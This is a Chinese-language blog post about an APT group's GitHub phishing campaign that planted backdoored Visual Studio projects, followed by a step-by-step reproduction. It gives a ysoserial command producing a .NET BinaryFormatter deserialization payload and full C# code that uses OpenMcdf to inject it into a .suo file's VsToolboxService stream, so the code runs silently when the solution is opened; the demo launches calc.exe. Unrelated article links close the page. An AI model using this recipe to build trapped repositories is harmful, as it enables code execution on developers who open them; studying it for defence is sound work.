6 [新一代Github投毒针对网络安全人员钓鱼]

0x01 前言

在Github上APT组织"海莲花"发布存在后门的提权BOF,通过该项目针对网络安全从业人员进行钓鱼。不过其实早在几年前就已经有人对Visual Studio项目恶意利用进行过研究,所以投毒的手法也不算是新的技术。但这次国内有大量的安全从业者转发该钓鱼项目导致此次事件的重要性,于是就有了这个"标题党"。

目前该钓鱼账号已经注销

0x02 攻击方式

该组织使用了Visual Studio程序中的 .suo 文件进行钓鱼攻击,当使用Visual Studio打开 .sln 程序的时候,Visual Studio 会自动加载并调用与之关联的 .suo 文件从而隐蔽的执行木马。

0x03 攻击复现

解决方案用户选项 (.suo) 文件是一种结构化存储或复合文件,以二进制格式存储。您可以将用户信息保存到流中,流的名称是用于识别 .suo 文件中的信息的键。解决方案用户选项文件用于存储用户首选项设置,并在 Visual Studio 保存解决方案时自动创建。

当环境打开 .suo 文件时,它会枚举所有当前已加载的 VSPackage。如果 VSPackage 实现了IVsPersistSolutionOpts接口,则环境会调用VSPackage 上的LoadUserOptions方法,要求它从 .suo 文件加载其所有数据。

VSPackage 负责了解它可能已将哪些流写入 .suo 文件。对于它写入的每个流,VSPackage 通过LoadPackageUserOpts回调环境以加载由键(即流的名称)标识的特定流。然后,环境回调 VSPackage 以读取该特定流,并传递流的名称和IStream指向LoadPackageUserOpts方法的指针。

这里我们需要通过Visual Studio创建一个Windows窗体应用,并且选择 视图 > 工具箱,在工具箱中,随便拖拽一个控件(如按钮)到设计界面进行保存后会在.vs文件夹里会存在.suo文件

那么我们就需要准备ysoserial生成 .NET 反序列化恶意Payload

复制代码
ysoserial.exe -f BinaryFormatter -g ActivitySurrogateDisableTypeCheck -o base64 -c "calc.exe"

接下来就需要安装 OpenMcdf 库,一个处理 Microsoft Compound 文件(如 .suo 文件)的 C# 库,打开 Package Manager Console,执行以下命令安装:

复制代码
Install-Package OpenMcdf

这时候就能创建一个新的.cs文件来把生成的 Payload 注入到 VsToolboxService 流中

复制代码
using System;
using OpenMcdf;
using System.IO;

class Program
{
    static void Main(string[] args)
    {
        string in_suo_file = @"C:\Path\To\.suo";  // 修改为实际的 .suo 文件路径
        string temp_file = @"C:\Path\To\test.suo";    // 修改为保存修改后的 .suo 文件路径

        // Base64 解码 ysoserial 生成的 Payload
        byte[] result = Convert.FromBase64String("YOUR_BASE64_PAYLOAD");  // 替换为第 2 步中生成的 Base64 字符串

        try
        {
            // 打开原始 .suo 文件 (UpdateMode)
            CompoundFile cf = new CompoundFile(in_suo_file, CFSUpdateMode.Update, CFSConfiguration.Default);

            // 获取 "VsToolboxService" 流并注入恶意数据
            CFStream stream = cf.RootStorage.GetStream("VsToolboxService");
            stream.SetData(result);

            // 提交更改
            cf.Commit();

            // 保存修改后的文件
            cf.SaveAs(temp_file);
            cf.Close();

            Console.WriteLine("Modified .suo file saved to temporary location: " + temp_file);

            // 你可以手动替换原 `.suo` 文件,或者在代码中执行替换
            File.Copy(temp_file, in_suo_file, true);

            Console.WriteLine("Original .suo file replaced successfully!");
        }
        catch (Exception ex)
        {
            Console.WriteLine("An error occurred: " + ex.Message);
        }
    }
}

这个时候我们的恶意.suo文件就做好了,那么我们重启这个项目看看会不会打开Windows计算器

相关推荐
一点一木2 小时前
🚀 2026 年 6 月 GitHub 十大热门项目排行榜 🔥
人工智能·github
冬奇Lab12 小时前
每日一个开源项目(第148篇):obsidian-skills - Obsidian CEO 亲写的 AI Agent 格式规范,让 Agent 不再破坏你的 Vault
人工智能·开源·资讯
程序员老赵18 小时前
Docker 部署 Redmine:老牌开源项目管理部署实测记录
docker·开源·团队管理
colir018 小时前
被粉丝夸爆的超级 ai 个人工作站,原来这么多福利
开源·agent·claude
程序员老赵19 小时前
服务器文件不想 SFTP 上传?Docker 跑个 File Browser,浏览器就能管理
服务器·docker·开源
饼干哥哥20 小时前
我把GPT-image-2生成PSD的能力打包成了Skill,免费开源
gpt·开源·ai编程
OpenTiny社区1 天前
从零开发 AI 聊天页要两周?试试这款 Vue3 垂直对话组件库 TinyRobot,直接开箱即用
前端·vue.js·github
逛逛GitHub1 天前
2 万多 Star!Google 开源了这个神级 GitHub 项目。
github
逛逛GitHub1 天前
免费 Token 烧掉 5 万亿之后,他们出了个一站式创作平台。
github
用户805533698031 天前
RK-Forge外设系列开篇 - 把板子从「能启动」变成「能用」:Ethernet/SPI/MMC 三个纯接线外设
linux·github·嵌入式